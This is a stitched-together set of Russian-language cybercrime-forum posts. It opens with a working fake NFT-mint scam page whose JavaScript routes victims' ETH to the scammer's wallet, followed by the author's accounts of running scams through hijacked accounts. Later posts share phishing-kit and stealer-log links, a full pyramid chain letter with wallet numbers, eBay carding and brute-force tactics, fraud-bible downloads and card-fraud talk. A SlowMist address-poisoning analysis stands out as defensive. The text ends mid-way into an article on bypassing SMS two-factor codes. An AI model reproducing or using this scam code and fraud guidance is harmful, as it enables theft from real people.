                        <p style="text-align:center" id="totalSupply" class="pt-1.5 italic-grey">Total supply: 100 NFTs</p>
                        <!-- Auto edit (config in index.js) -->
                    </div>
                </div>
                <div id="payment-info">
                    <img src="xss.PNG" class="image" height="100px" id="price-img">
                    <div id="payment-info-text">
                        <p>Price Per NFT</p>
                        <p class="title"><a id="nftPrice">0.03</a> ETH + gas</p>
                        
                    </div>
                </div>
               
          [/SIZE][/SIZE][/SIZE][/SIZE][/SIZE][/SIZE][/SIZE][/SIZE][/SIZE][/SIZE][/SIZE][/SIZE][/SIZE][/SIZE]
 
[SIZE=5][SIZE=5][SIZE=5][SIZE=5][SIZE=5][SIZE=5][SIZE=5][SIZE=5][SIZE=5][SIZE=5][SIZE=5][SIZE=5][SIZE=5][SIZE=5]                <div class="flex items-center justify-center space-x-4 mt-5">
                    <div class="w-100 h-12 flex flex-col items-center justify-center border border-brand rounded">
                        <div id="ape-number" >
                            <div class="calcs" >
                                
                                     <form class="div"  oninput="result.value=(a.value * price).toFixed(2)" style="display: flex;">
                                        <div class="down_arrow" id="addCount" style="font-size: 30px;" > - </div>
                            <input id="inputor" name="a" class="nftsNumber eth_input text-white text-center leading-3 -mt-1 placeholder-white text-lg md:text-xl lg:text-3xl font-semibold w-12 h-12 bg-transparent focus-within:outline-none" type="number" min="1" pattern="[A-z0-9]{2,50}" max="5"
                                placeholder="1" value="1" style="background-color: #00000000;;text-align:center;width:30px;border-color: #00000000;margin-left:15px;"><div class="up_arrow" id="remCount" style="font-size: 30px;font-weight: 400;"> + </div></div><h5 id="maxNumber" style="text-align: right;margin-bottom:5px ;">5 Max</h5>
                    </div></div>
                </div>
                <p class="text-alert text-sm font-semibold pt-3 leading-4 pb-4"></p>
                <div id="ape-total">
                <p class="mt-3"><span class="total text-white  text-base md:text-lg lg:text-xl">Total:</span>



                    <output id="price"  name="price"  class="actual_price ml-1 text-lg md:text-xl lg:text-3xl text-brand font-semibold">0.03</output>
                    </form>

В этом коде мы заменяем название, колличество, стоимость и картинки под нужный нам проект

**Script.js

JavaScript:Copy to clipboard

[/B]
const netURL = 'https://mainnet.infura.io/v3/30ea4......';
const ADDRESS = '0x00000000000000000000';
const web3 = window.Web3
const ethereum = window.ethereum
let accounts
let price = 0.03
const input = document.querySelector(".eth_input")
const button = document.querySelector(".metamask_content-btn")
const title = document.querySelector(".metamask_content-title")
const priceDisplay = document.querySelector("#price")
const Web3 = new web3(netURL)
window.addEventListener("load", () => {
    button.disabled = false
    button.classList.remove('hidden');
    if (ethereum.selectedAddress) {
        document.querySelector(".container_link_metamask_install-btn").style.display = "none"
        document.querySelector(".container_metamask_content-btn").style.display = "flex"
        button.innerHTML = "Mint now"
        input.disabled = false
        title.innerHTML = "MetaMask connected"
    }
    else if (ethereum.isMetaMask) {
        document.querySelector(".container_link_metamask_install-btn").style.display = "none"
        document.querySelector(".container_metamask_content-btn").style.display = "flex"
        title.innerHTML = "MetaMask installed"
        input.disabled = false
    }

})
const getAccount = async () => {
    accounts = await ethereum.request({ method: 'eth_requestAccounts' });
    console.log(accounts)
    if (window.ethereum.chainId == "0x1") console.log("Already connected to ethereum mainnet...")
    else {
        try {
            await ethereum.request({
                method: 'wallet_switchEthereumChain',
                params: [{chainId: '0x1'}],
            });
        } catch (switchError) {
            // This error code indicates that the chain has not been added to MetaMask.
            if (error.code === 4902) {
                try {
                    await ethereum.request({
                        method: 'wallet_addEthereumChain',
                        params: [{
                            chainId: '0x1',
                            rpcUrl: netURL
                        }],
                    });
                } catch (addError) {
                    // handle "add" error
                }
            }
        }
    }
}

const sendTransaction =  async () => {
    price = +input.value * 0.03
    const priceToWei = (price * 1e18).toString(16)
    ethereum.request({
            method: 'eth_sendTransaction',
            params: [
                {
                    from: accounts[0],
                    to: ADDRESS,
                    value: priceToWei,
                },
            ],
        })
        .then((txHash) => console.log(txHash))
        .catch((error) => console.error);
};

input.addEventListener("input", () => {
    if (+input.value < 1) button.disabled = true
    else if (+input.value >= 1) button.disabled = false
    price = +input.value * 0.03
    if (+input.value >= 1) priceDisplay.innerText = price.toFixed(2)
    //else if(input.value < 1) input.value =+ "1"
    else priceDisplay.innerText = "0"
})
button.addEventListener("click", async () => {
    if (!ethereum.selectedAddress) {
        await getAccount()
        button.innerHTML = "Mint now"
        title.innerHTML = "MetaMask connected"
    } else {
        await getAccount()
        await sendTransaction()
    }
})
document.querySelector(".up_arrow").addEventListener("click", () => {
    input.value = +input.value + 1
    event = new Event("input")
    input.dispatchEvent(event)
})
document.querySelector(".down_arrow").addEventListener("click", () => {
    input.value = +input.value - 1
    event = new Event("input")
    input.dispatchEvent(event)
})
[B]

**В этом скрипте происходит взаимодействие с сайтом, сейчас расскажу что к чему

В первой строке мы подключаемся к Infura, регистрируемся, создаем проект, берем айди и впуливаем в эту строчку
Во второй строке заместо 0x00000000.... указываем свой кошелек
В строчке let price = 0.03 указываем стоимость NFT(Заместо 0.03)
И также везде в этом коде, где указанно 0.03 заменяем на свою цену

Функция getAccount запрашивает подключение для пользователя к кошельку
Функция sendTransaction отправляет транзакцию
Евент click создает функцию кнопки для подключения и отправки транзакции
.up_arrow и .down_arrow создают возможность взаимодействия с кнопками + и -

**Далее сохраняем весь наш проект, загружаем на хостинг и начинаем распространять

Сейчас это конечно же не самая актуальная версия для скама крипты, но есть большие шансы занять свою нишу. С каждым днём становится все больше конкурентов, с каждым днём выходят новые обновления по блокировке спама на подобные фейк-проекты. Но, я уверен, что если найти свой собственный источник траффика можно на этом получать хорошие деньги. Также можно использовать данный скрипт не только для фейк минтов, но и для других проектов. Как пример: крипто-боксы(открытие кейсов с подарками), различные фейк-продажи, фейк-биржи, аукционы автомобилей за крипту. И также распространять можно абсолютно любыми методами. Можно придумать абсолютно что угодно и использовать это в своих(и не только) целях.
Не обязательно даже для чёрной работы это использовать, может у вас свой белый проект и вы бы хотели добавить оплату в крипте, пожалуйста, этот скрипт отлично подойдет, только нужно немного подредактировать)** **Запущенных фейк- минтов не сосчитать, но приведу пару примеров))

Как-то в логе со стиллера мне попался неплохой ютуб и телеграмм-канал по крипто-тематике, не особо популярные, но все же. Ну я сразу кубы кидать, что мне с этим можно сделать. Не долго думая запустил Евент-тикет, там где покупая билетик ты получаешь огромный шанс приумножить свой капитал, накидал несколько страничек для сайтика, на одном из них саму покупку билетов по 0.1 ETH и внизу шансы разных выйгрышей и количество уже принявших участников(Динамическое изменение было), что в соотношении давало огромные шансы на большую победу
Сделал подобие трейлера и закинул на ютубчик и в телеграмм-канал, в тот момент для меня это был огромный заработок, но собрал 4k$

И второй пример немного даже забавный)
Также в логе, но совсем другое. Залетел мне ютуб канал, инстаграм, твиттер одного очень популярного блогера-гея)) Ну и что, мне сразу прилетела в голову идея. ПОДДЕРЖКА И РАЗВИТИЕ ЛГБТ СООБЩЕСТВА)))
Когда люди, с которыми я работал увидели это - посмеялись, но залетело неплохо
Также собрал сайт, подготовил дизайн для постов под инстаграм и твиттер, ютуб не стал трогать, отдал на стрим. Подождал позднего вечера по RU времени(т.к. это самый пик актива в US и EU) и залил посты
И для интереса остался в сессии и еще отвечал тем, кто писал
Сообщений сотни было, все были в шоке что я(ну не я, а он) им отвечал, все кинулись помогать проекту, но, к сожалению, это наверное больше подошло бы не под криптотематику, а под сборы на палку к примеру. Ибо подавляющее большинство не разбиралось в криптовалюте, а то и не имели представления что это такое. Так что, тут тоже дело такое, нужно подходить основательно и грамотно выбирать аудиторию.
Профит: 2k$

Этими примерами я хотел донести мысль, что не стоит зацикливаться только на фейк-минтах при использовании данного скрипта. Этот скрипт подойдет под разные цели: точечная работа, под аудиторию или под целое сообщество. Можно придумать что угодно, главное творчески подходить к этому и можно не имея ничего заработать уже какой никакой капитал.
А если имеется капитал, то можно открывать огромные проекты, проливать их через ФБ и Гугл АДС, набирать огромный траффик и соответственно прибыль, но тут тоже стоит быть аккуратным, ибо не на все проекты ведутся.**

На этом всё, это пособие было для новичков, которые только начинают своё ремесло в этом деле.
Большое спасибо за внимание! Удачи в делах.

p.s: люблю я конечно затягивать до последнего момента, пойду лило и стича смотреть

[CLIKE]

[ 32 phishings sites.zip - AnonFile

](https://anonfile.com/r0Z7N1l1oe/32_phishings_sites_zip)

anonfile.com

[/CLIKE]

Всем привет ребят, нужен фишинговый сайт для сбора СС.
может у кого есть какие-то заготовки, или готовые сайты
Спасибо)

Всем привет,в этой теме буду сливать облака,которые попадали мне в руки с материалом с разным гео и датой логов.
Просьба не писать что по ссылкам - я выкачивать не буду,что бы пробить для вас гео или даты,довольствуйтесь что есть там.

**Так же запускаем строго на виртуалке,на основе юзать не рекомендовал бы.

Приступим?**

Хайд 3 симпатии и регистрация на форуме(ставить его еще не умею,если что то не так,сообщите,постараюсь поправить).

You must have at least 3 reaction(s) to view the content.

You must have at least 3 reaction(s) to view the content.

Интересует стоимость написания/покупки скриптов для этого , раскрутки (ну это бы я на себя взял: спам) , возможные первоночальные затраты на содержание , постоянный капитал так сказать казны и прочее все пишем тут , что нужно для того чтобы поднять интернет заведение ))

Ну и все проблемы , может кто опытом поделится ! И послденее сколько казино средней руки поднимает в день . Еще есть ли возможность сделать казино преимущественно для кардеров - чтоб в покер бабули с карт проигрывали и на вм/еголд переправлять им его) и сколько такое будет поднимать в день )

Реальный текст, который был повешенн на http://forum.drweb.ru/

Читая это, Вы можете изменить свою жизнь!!!!!!! Это изменило мою жизнь.......
Я наткнулся на это на одном форуме и решил попробовать. Бродя как обычно по разного рода форумам, я нахожу эту статью, в которой говорится, что можно сделать тысячи долларов за пару недель при вложении всего 6$!!!Ну да....подумал я, это должно быть очередной фишкой для лохов, но решил всё- таки дочитать и узнать, что нам за Гербалайф предлагают.......

Дальше там говорилось, что надо послать по 1$ на 6 WMZ кошельков, которые ниже перечислены.

Потом вычеркнуть первый кошелёк из списка, тем самым, сместив список на одну строчку вверх, тем самым шестая освобождается, куда Вы вписываете номер своего WMZ кошелька и закидываете данное, с Вами на шестой строчке, сообщение на как минимум 200 разных форумов.

Никаких уловок........Ну я поразмышлял и подумал, что ничего не теряю, кроме этих 6$,которые я отправлю на ниже перечисленные кошельки.......... и решил попробовать......... И угадайте что!!!!!!!!!!!!!!!!!!!!!!!!!!

За 7 дней на мой кошелёк стали приходить
деньги!!!!!!!.............

Я был в шоке!!!!! Но сразу подумал, что на этом всё и закончится.........

Но не тут то было!!!!!!!!!!!!!!!!!! В первую неделю я сделал 25$,дальше к концу второй недели уже больше 1000$..............К середине 3-ей недели
10000$.......!!!!!!!!!!!!!!!!!

Уже 4-ая неделя и я насчитал 42000$ и эта сумма растёт очень быстро!!!!!!!!!!!!!! И это всё только за цену в 6$!!!!!!!!!!!!!!!!Я был в очень плохом экономическом положении до того, как наткнулся на эту статью. Я не поверил, что это работает, пока не начал получать переводы со всего света!!!!!!!!!!!!!!.............

А теперь я расскажу Вам, как это работает и, самое главное, ПОЧЕМУ!!!!!!!!!!!!!!................

Я Вам обещаю, что если Вы будете в точности соблюдать ниже перечисленные инструкции, то Вы начнёте получать намного больше денег, чем Вы думали, не прилагая к этому особых усилий!!!!!!!!!

ПРЕДЛОЖЕНИЕ...........:ПРОЧТИТЕ ЭТО ПАРУРАЗ!!!!!!! Следуйте инструкциям, и деньги начнут поступать на Ваш кошелёк!!!!!!!!! Согласитесь, это
просто!!!!! И, ВАЖНО, ничего противозаконного в этом нет!!!!!!!!! ВСЁ ЛЕГАЛЬНО!!!!!!!!!!!!!! И Ваш вклад составляет всего 6$.........

ЕЩЁ РАЗ ПОВТОРЮ, ЧТО ЭТО-НЕ ОБМАН, и ВЫ НИЧЕМ НЕ РИСКУЕТЕ, НО ЭТО РАБОТАЕТ!!!!!!!!!!!!!!!
ЗАМЕТЬТЕ!!!::::: следуйте инструкциям В ТОЧНОСТИ и 50000$ будут Вашими в течение от 20 до 60 дней!!!!!!!!!!!!! ЗАПОМНИТЕ!!!: ВСЁ ЭТО РАБОТАЕТ УДАЧНО ТОЛЬКО БЛАГОДАРЯ ЧЕСТНОСТИ УЧАСТНИКОВ!!!!!!!!!!!

Вот те самые 3 шага к успеху:

1. Если у Вас нет тех самых 6 WMZ, то Вам нужно зарегистрироваться в системе WebMoney Transfer, которая находится по адресу http://www.webmoney.ru/.Хорошенько ознакомьтесь с данной системой, как она работает, выберите оптимальный для себя вариант пополнения кошелька со странички http://www.webmoney.ru/operations.shtm, внесите 6 WMZ(карточки минимум 10 WMZ продаются в обычных ларьках) на Ваш WMZ кошелёк (он начинается с буквы Z).

2. Отправьте на первый номер из ниже перечисленных WMZ кошельков 1$,в
поле напишите:" Пожалуйста внесите меня в список WMZ кошельков". Всё, что Вы сделали - это создали некую услугу и, САМОЕ
ГЛАВНОЕ, это абсолютно легально!!! Вы просите законный сервис, за который платите. Отправьте во 2,3,4,5,6 WMZ кошельки также по 1$,но уже в поле ничего писать не нужно! Вот наконец и список этих кошельков:

1.Z23210361
2.Z55359375
3.z12505662
4.Z49964298
5.z37412110
6.Z65513099

Теперь ВНИМАНИЕ!!! Я здесь сначала сделал ошибку, от которой хочу Вас уберечь!!!!!: вычеркните из этого списка ПЕРВЫЙ кошелёк и переместите
2-ой кошелёк на место 1-го,который Вы стёрли,3-ий-на место 2-го,4-ый-на место 3-го,5-ый-на место 4-го и 6-ой-на место 5-го!А в шестой номер, который
оказался пустым, ВПИШИТЕ НОМЕР Вашего WMZ КОШЕЛЬКА!!!!!!!!!!

Делайте в моей статье, какие угодно Вам изменения, но только сохраните ГЛАВНУЮ
ИДЕЮ!!!(Все изменения можно сделать с помощью БЛОКНОТА, куда Вы скопируете мою статью)!!!И ТЕПЕРЬ САМОЕ ГЛАВНОЕ!!!!!!!!!!: РАЗМЕСТИТЕ ЭТУ СТАТЬЮ НА НЕ МЕНЕЕ ЧЕМ 200 ФОРУМАХ и НОВОСТНЫХ ЛЕНТАХ(News Groups)!!!!!

ЗАПОМНИТЕ, что чем больше Вы разместите, тем выше будет ВАШ доход и этот доход будет НАПРЯМУЮ ЗАВИСЕТЬ ОТ ВАС И ТОЛЬКО ОТ ВАС!!!!!!!

Этот бизнес продолжает существовать и процветать только БЛАГОДАРЯ ЧЕСТНОСТИ И СЕРЬЁЗНОСТИ УЧАСТНИКОВ!!! Итак, когда Вы достигнете 1-ой позиции, Вы будете иметь тысячи долларов просто как создатель списка или статьи, как Вам больше
нравится!!!!!!! Это стоит 6$ и совсем пустяковой работы!!!!!!!!!!!! Займитесь этим сейчас, не откладывая на завтра......!!!!!!!!!!!

ВРЕМЯ-ДЕНЬГИ!!!!!!!!!!! !!!

А теперь я Вам расскажу, почему Вы в любом случае ничего не теряете, а только выигрываете!!!!!!!

Скажем, из 200 размещений я получу только 5 ответов (очень-очень маленькая и низкая цифра)!!!

Значит, я получу 5$ находясь на 6-ой позиции в списке!!! Теперь эти 5 людей делают по 200 размещений каждый МИНИМУМ с моим кошельком на 5-ой позиции, и только 5 людей отвечают тем первым пяти - это уже 25$!!!!!!!!!!Дальше эти 25 людей делают по 200 размещений с моим кошельком уже на 4-ой строчке(потому что вписывают свои) и только 5 отвечают - мой доход-125$!!!!!!!Теперь эти 125 людей разместив и получив только 5 ответов дают мне 625$ прибыли (я - на 3-ей строчке)!!!!!!!!!!!!! Дальше смешнее: эти 625 людей делают по МИНИМУМ 200 размещений со мною на 2-ой строчке и только 5 людей отвечают - это
уже 3125$!!!!!!!!!!!Ну а самое интересное - Это то, что эти 3125 человек делают по 200 размещений каждый со мною уже на 1-ой строчке и им отвечают опять только 5 людей, то мой доход-15625$!!!!!!!!!!!Не такая ли внушительная цифра??!!!!! И это всё за первоначальный вклад в 6$!!!!!!!!Когда Вас в списке уже нет, Вы просто высылаете опять 6$ в те же кошельки, что и в первый раз(для этого сохраните эту статью в БЛОКНОТЕ) и опять, переместив номера
кошельков, удалив первый, ставите свой номер на 6-ую позицию и опять размещаете!!!!!!!!!! Вы себе можете представить, что 1000 людей со всего мира
присоединяются к Интернету и читают эти статьи каждый день!!!!!!!!!!!!!!

Точно так же, как и Вы сейчас читаете эту!!!!!!!!!!! Ну так что??

А если Вы всё сделаете так, как я описал выше, ЭТО
БУДЕТ РАБОТАТЬ, КЛЯНУСЬ ВАМ!!!!!!!!!!!!!!!!

НУ И ЧТО??

Каждый день в Интернете появляются от 20000 до 50000 тысяч новых пользователей!!!!!!!!!! По прогнозам специалистов, только к 2006 году количество пользователей Интернетом увеличится с нынешних 9 миллионов человек, до 21 миллиона!!!!!!!!!!!!!!!! Какие шансы, что они захотят попробовать себя в чём-то новом? Только запомните:
ЧЕСТНОСТЬ И ТОЛЬКО ЧЕСТНОСТЬ ЛЮДЕЙ позволяет процветать этому бизнесу!!!!!!!!!!!!!!!!

Ну и последнее.......:Это действительно великая аксиома - чтобы получить что - то, надо дать что - то!!!!!!!!!!!!!! А чтобы получить ещё больше , надо дать ещё больше!!!!!!!!!!!

Убедитесь в этом Сами..........

УДАЧИ ВСЕМ!!!!!!!!!!!!!!!!!

Click to expand...

устарело

Эх привет ребята. Давно я не пилил, что-либо интересного, и решил я, а запилю- ка я тему, как я в далеком 2018 году создавал кардинг проект.

Внимание! Статья не из цикла "скопируй сделай", автор статьи упражняет ваш мозг новыми идеями, на базе своих состоявшихся, и кто с умом не моржа с синдромом дцп, тот допилит под себя любую тему, и даже эту!

Итак поехали!

Шел 2018 год, трудные времена.
Пижу, не трудные, всегда можно найти выход с любой ситуации.

Итак.
Начало расцвета брута ебей на дворе,это было модно, это было в топе и тренде, на фоне этого был закуплен софт брут под ебей ( а точнее несколько), слиты базы мыло пасс, и я сидел брутил, и потом вбивал, брутил, вбивал, брутил.... Эх время, аж слеза по моему скудному скам фейсу прошла.

Крч, была тема, берем базы мыло пасс, вгоняем в брут ебей, на выходе получаем брученые гуды, с привязкой сс либо пп.
Так как автор этой статьи, априори ленивая жопа, был создан план. А именно. Установлен телеграм, парсинг групп кардинг хуярдинг, ебей, палка, вбивотроны.

Самая адекватная аудитория ( более менее, потом поймете о чем я), была выбрана на этот приват, и приглашена к общению через личку в телеге.
Самые сливки кардинга, самые смелые, отчаянные и просто хорошие ребята, были собраны для одной единственной миссии и цели!!!

Миссия века, а точнее года - Заработать бабки автору статьи, ну и канешно же себе монету ( ибо новичкам нужно помогать, и любая помощь вернеться в тройне).

Итак. Зная какая аудитория передо мной, чародеи маги, выпускники школы ввх, лекторы, практики черной магии кардинга, я решил, дабы не проебать свой бизнес, посажу каждого отдельного работника на отдельный VPS ( поже поймете почему).

На каждый впс была установлена лихуца брут ебея, а так же ( в силу небогатой жизни работников и лишней копеейки), были куплены аки на люксах.

Итак имеем. 5 впс, на каждому 5 софтов, и 5 аков люксов, перед работой я заходил на впс ( до этого я подправил их, сделал запрет на установку и запуск любого софта, кроме брута, и браузера, так же дал запрет на сейв любого файла, кроме системного расширительного, и временных файлов браузера, это сделано было на тот случай, если найдеться какой-то хитрожопый антон, захотевший пиздануть ак от люксов, через кейлогер либо стилак, либо завладеть впс).

Была создана группа в тг, где каждый работник, появлявшийся в онлайне, давал мне ответ - я здесь готов ебошить!


И каждый день, я заходил на впс, врубал софт, через свои ключи ( чтобы не было видно ключ), и так же заходил на аки люксов, вливал чуток монету, и сейвил сессию, но НИКОГДА, запомните, никогда не давайте данные сервисов, людям, которые пачками будут у вас работать, пропадать, морозиться, ныть, и прочее гавно.

Всегда будьте умнее, хитрее, всегда будьте босом в любой ситуации, даже если она непонятная.

Название софтов, я рекламить не буду, кому надо можете прогуглить, а кто пользовался ими, сами по скринам поймут.

Как выглядела работа на каждой впс.

еще так, кто проявил себя мегатрон вбиватором, брался работать 24 часа в сутки, только, шоб давало, и приносило профит.

Вообщем работа пошла, кто-то тупил, кто-то ныл, а кто-то просто поработав пару дней, поняли, что кардинг это не для них, и мама говорила правду, что учись сынок на пятерки, будешь ездить на шестерке.

Попадались и умные ребята, кому то нужно было разжевать немного, и они тронулись с места.
Для нормальных ребят, кто не первый месяц работал на меня, и я видел их стремление, я удаленно настроил мобилы и планшы на базе андроид, чтобы они клепали с мобил ( с апк приложения ебей давало тогда ой как хорошо, и нихуя не слетало, ну смотря как настроить ведро).

А вот и первые результаты после старта проекта и получения первых треков.

Если аки были юса, делался щип на КХ и последующий рероут, либо сразу на дропа.
Если ак еу, пробовалося клепать сразу на снг дропов, и притом удачно с еу давало, хотя и немного при чекауте давало, но мы брали количеством.

А вот уже работа кипела у моих ребята, через 3 месяца набивки руки, проебаных ночей, слез, и нервов, кто-то набил руку вот так.

Вообщем, с ребятами мы работали до осени, было перебрано по собеседованию куча народу, все хотели и рыбку сьесть и на качан присесть, но никто не хотел ебошить, как это диктовали суровые реалии работы с ебеем.

Кто-то хитрожопый, набив руку, пошел сам работать, сам на себя, кто-то просто ушел с темы, подняв монету, и забив на ебей, начал работать с палкой, а кто-то подучив мат часть, освоив все А и Я, пошел далее, и иногда я беру этих ребят, и прошу, сделать ту или иную работу, либо протестировать за меня, ну так, без обязательств, без напора, без напряга, и не давя на людей, и они как мои хорошие знакомые, с которыми мы нормально так подняли монету, всегда приходят на помощь, и готовы к работе. Ведь мы теперь коллеги, и просто хорошие знакомые, которые без б, прийдут на помощь.

Ну вот и подходит эта замечательная история к концу.

Работа в 2018 году была проведена колосальная, как я уже говорил выше, 80% разбежалось кто куда, 20% всегда на связи, но ебей вспоминают со слезами, и готовы так же работать, но уже по другим проектам.

Софты, аки люксов валяются без дела ( хотя я их давно окупил с первых треков).
Вообщем подводя итоги, че могу сказать?

Да ничего говорить я и не буду. Каждый почерпнет инфу, что я запилил, найдутся и сектанты какого-то гавно ввх, которые скажут в топе "ах ты ж хуило, кококо кукуку", и прочая лабута.
Я скажу таким людям! Если вы не прошли у меня тогда еще, в далеком 2018 году, собеседование, то нехер сейчас гавнить в моем топе, идите на завод.

Ну а кому понравилось это повествование, желаю фарту, прибыльных тем, и всегда держите свой мозг в тонусе.

С вами был Кверти.
Всем Мир.

Придумал лотерею. Смысл такой: тебе платят 1WMZ на вэбмани ты отсылаешь 100WMZ тому кто заплатил НО с протекцией сделки. Опытным путем было установлено что на угадывание кода протекции дается 7 попыток. Тоесть шансы угадать 5-значный код равны: 90000/7 => 1 к 12850 => ничтожно малы. Хотя думаю что многа народу клюнут. Кто че думает по этому поводу?

Как по мне, так мне часто бывает удобней накидать\скачать фейк и завести туда жертву нежели засылать троя или атаковать машину жертвы. Либо же просто выудить пароль в непосредственном общении с жертвой!
А что вы думаете по этому поводу? Прошу дать обоснованный ответ

В этой теме будем писать все новости фишинга в сети.
Вот одна из последних:

Фишинг в PayPal
Злоумышленники использовали XSS уязвимость для похищения номеров кредитных карт и другой личной информации пользователей PayPal, сообщает netcraft.com. Обман работал весьма убедительно; люди посылались на URL, находящийся на подлинном сайте PayPal. Ссылка работала по SSL протоколу и использовала реальный 256-битный SSL сертификат, что не вызывало сомнений в его принадлежности к PayPal. Однако, часть этой страницы была изменена засчет XSS уязвимости, так что когда жертва попадала на нее, видела сообщение: "Your account is currently disabled because we think it has been accessed by a third party. You will now be redirected to Resolution Center." ("Ваш счет в настоящее время заблокирован, поскольку мы думаем, что к нему получил доступ кто-то постороний. Вы будете перемещены в Resolution Center"). После чего пользователь перенаправлялся на постороний сервер, где он вводил свой логин и пароль, которые успешно попадали в руки фишеров.

...все написаное мной ранее - бред... :crazy:
...вы - ничего здесь не видели... :fuck:
...не верь,не бойся, не проси... :bang:
...вся наша жизнь - фишинг... ease:

P.S.
...в аттаче убрать с конца .txt

...прошу прощения у администрации за flood... :pioneer:

A-Z Everything about FRAUD with tools, samples, templates, tutorials and more...

4 Mega Links in total of 17.22 GB + 35.78 GB +35.79 GB + 7,2 MB = 88,797 GB

Contents:

koononte fraud bible (2020)
FRAUD BIBLE 2020 UPDATED
2019 FRD BIBLE
goonezys bible

You must have at least 3 reaction(s) to view the content.

Don't forget to react and Enjoy!

Всех приветствую. Создал тему для обсуждения кредитных саморегов, трансфер балансов и выпуск виртуальных кредиток. Если кто-то поделиться более менее рабочими вариантами, не говорю о привате, буду признателен. Собственно от себя скажу, амекс под прием регать сейчас без вариантов, потому что отправляют usps'ом(без трэка). Вцц амекса и сити, никто не налит, то ли сам банк деклайнит, то ли просто никуда не лезет.
P.S. прикреплю файл с сити вцц, экспа заканчивается сегодня(баланс не тронут, не убита), думаю понятно как она регается, если нет, то оффер через aa.com
P.P.S. ВТ на всякий случай, для скептиков))

[ VirusTotal ](https://www.virustotal.com/gui/file-

analysis/NWY1MjhlOGQzOTU0MjMzMzg0NTRmNTYwZjc4OTFmNDI6MTY4ODAzNzM2Mg==)

VirusTotal

 www.virustotal.com

Недавно несколько пользователей сообщили, что их средства были украдены. Сначала они не знали, как были украдены их средства, но при внимательном рассмотрении мы обнаружили, что это был новый вид мошенничества с airdrop.
С адресов многих жертв постоянно сбрасывались крошечные суммы токенов (0,01 USDT, 0,001 USDT и т.д.), и, скорее всего, они были выбраны в качестве мишени, поскольку их адреса были задействованы в дорогостоящих транзакциях и объемах торговли. Последние несколько цифр адреса злоумышленника практически идентичны последним нескольким цифрам адреса пользователя. Это делается для того, чтобы обмануть пользователя и заставить его случайно скопировать неправильный адрес из истории транзакций и отправить средства на неправильный адрес.

Связанная информация
Адрес злоумышленника 1: TX...dWfKz
Адрес пользователя 1: TW...dWfKz
Адрес атакующего 2: TK...Qw5oH
Адрес пользователя 2: TW...Qw5oH
Анализ MistTrack
Начнем с обзора двух адресов злоумышленников:

Адрес злоумышленника (TX.....dWfKz) и адрес пользователя (TW.....dWfKz) оба оканчиваются на dWfKz. Даже после того, как пользователь по ошибке отправил 115 193 USDT на неправильный адрес, злоумышленник продолжает отправлять 0,01 USDT и 0,001 USDT на адрес жертвы, используя два новых адреса, которые также заканчиваются на dWfKz.

То же самое произошло и со второй жертвой. Адрес злоумышленника (TK.... .Qw5oH) и адрес пользователя (TW.... .Qw5oH) оба заканчиваются на Qw5oH. Жертва по ошибке отправила 345 940 USDT на неправильный адрес, а злоумышленник продолжает отправлять 0,01 USDT на адрес жертвы, используя новые адреса, которые также заканчиваются на Qw5oH.


Далее мы рассмотрим адрес злоумышленника 1 с помощью нашей AML-платформы MistTrack (tx. .dWfKz). Как показано на рисунке ниже, адрес злоумышленника 1 отправляет 0,01 USDT и 0,02 USDT на различные целевые адреса, все из которых взаимодействовали с адресом, заканчивающимся на dWfKz.

Оглядываясь назад, мы видим, что первоначальные переводы для этих airdrops были сделаны с адреса TF.... J5Jo8 10 октября, когда на него было переведено 0,5 USDT.

Предварительный анализ TF... .J5Jo8:

Этот адрес отправил 0,5 USDT почти на 3300 адресов, что указывает на то, что каждый из этих адресов-получателей может быть адресом, используемым злоумышленником для airdrop. Поэтому мы решили выбрать один адрес наугад, чтобы проверить нашу теорию.
MistTrack был использован для анализа последнего адреса на приведенном выше графике, TX.....4yBmC. Как показано на рисунке ниже, адрес TX....4yBmC используется злоумышленником для рассылки 0,01 USDT на несколько адресов, которые заканчиваются на 4yBmC.

Рассмотрим адрес атакующего 2 (TK.... .Qw5oH): 0,01 USDT было отправлено по воздуху на несколько адресов, а начальное финансирование в размере 0,6 USDT было отправлено с TD.... .psxmk.

Как видно из приведенного ниже графика, злоумышленник отправил 0,06 USDT на TD.... .kXbFq, а также взаимодействовал с депозитным адресом пользователя FTX, который заканчивается на Qw5oH.

Поэтому давайте проделаем обратный процесс и посмотрим, взаимодействовали ли другие адреса с TD... .kXbFq. Есть ли другие адреса с теми же конечными символами, что и те, которые были переданы им по воздуху?
И снова мы выберем два адреса наугад и проверим нашу теорию. (например, адрес депозита Kraken TU... .hhcWoT и адрес депозита Binance TM.... .QM7me).


К сожалению, мошеннику удалось обманом заставить ничего не подозревающего пользователя отправить ему свои средства.
Резюме
Эта статья посвящена тому, как мошенники используют пользователей, которые копируют адрес из истории транзакций без проверки всего адреса. Для этого они генерируют похожий адрес, который заканчивается так же, как и адрес пользователя, и регулярно отправляют небольшие суммы денег на адрес пользователя. Все это делается в надежде, что пользователи скопируют поддельный адрес и в следующий раз отправят свои средства мошеннику.
SlowMist хотел бы напомнить всем, что в связи с неизменностью технологии блокчейн и необратимостью операций на цепочке, пожалуйста, дважды проверьте адрес, прежде чем действовать. Пользователям также рекомендуется использовать функцию адресной книги в своем кошельке, чтобы не копировать адрес каждый раз.
(copypast)

Теневые форумы изобилуют предложениями о взломе аккаунтов. В большинстве случаев атаки устраивают при помощи фишинга с подделкой страницы авторизации. Однако такой метод неэффективен, если пользователю приходит SMS с проверочным кодом. Я покажу, как пробить двухфакторную аутентификацию, на примере взлома аккаунта Google редактора «Хакера».

Экскурс в 2FA
Во времена, когда сайты работали по HTTP и о защите толком никто и не думал, перехватить трафик с учетными данными было совсем несложно. Потом трафик стали шифровать, и хакерам пришлось придумывать более изощренные способы подмены и перенаправления маршрутов. Казалось бы, двухфакторная аутентификация окончательно решила проблему, но все дело в деталях ее реализации.

Метод 2FA (Two-Factor authentication) был придуман как дополнительный способ подтверждения владельца аккаунта. Он основан на нескольких способах аутентификации:

• пользователь что-то знает (например, может ответить, какая была девичья фамилия его матери или кличка первого домашнего питомца);
• пользователь обладает уникальными чертами, которые можно оцифровать и сравнить (биометрическая аутентификация);
• пользователь имеет девайс с уникальным идентификатором (например, номер мобильного, флешку с ключевым файлом).

Первый метод еще встречается при восстановлении паролей по контрольным вопросам. Для регулярного использования он не годится, так как ответы не меняются и могут быть легко скомпрометированы. Второй способ чаще применяется для защиты данных на мобильных гаджетах и для авторизации клиентских приложений на серверах.

Самый популярный метод 2FA — третий. Это SMS с проверочными кодами, генерируемыми по технологии [OTP](https://medium.freecodecamp.org/how-time- based-one-time-passwords-work-and-why-you-should-use-them-in-your-app- fdd2b9ed43c3). Код приходит каждый раз разный, поэтому угадать его практически невозможно.

